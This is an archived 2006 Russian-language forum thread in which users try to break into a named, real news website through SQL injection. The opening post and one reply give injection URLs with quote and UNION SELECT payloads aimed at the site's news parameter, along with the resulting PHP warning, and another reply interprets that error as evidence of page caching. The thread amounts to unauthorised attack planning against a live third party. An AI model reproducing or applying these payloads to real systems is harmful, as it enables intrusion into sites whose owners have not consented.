PDA

Просмотр полной версии : SQL Injection HELP!


MetallicA
18.02.2006, 04:48
Всем привет! Юзал один сайт дабы вроди нащёл помеху
http://rustavi2.com.ge/news_textg.php?id_news=00'
вылазиют разные варнинги но дальше не могу использовать эту помеху) Юзаю так:
http://rustavi2.com.ge/news_textg.php?id_news=00'%20UNION%20select%20null ,null%20/*
В результате (Делал по разному но таже самая фигня)
/*
Warning: fopen(cache/news_textg.phpid_news=00\'%20UNION%20select%20null ,null%20/*.cache): failed to open stream: No such file or directory in /www/rustavi2.com/doc/includes/cache.php on line 24
*/
Чё за фигня? или я чтото не так делаю?

vfDcs
18.02.2006, 07:57
попробуй так:
http://rustavi2.com.ge/news_textg.php?id_news=0+union+select+1,1,1,1,1,1, 1,1,1/*

fucker"ok
18.02.2006, 14:11
Warning: fopen(cache/news_textg.phpid_news=00\'%20UNION%20select%20null ,null%20/*.cache): failed to open stream: No such file or directory in /www/rustavi2.com/doc/includes/cache.php on line 24

Это значит они используют кеширование страниц, чтобы каждый раз не формировать страницу заново.
Твоего вывода в кеше нет, и он страницу не формирует по новой почему-то...
Помоему так :]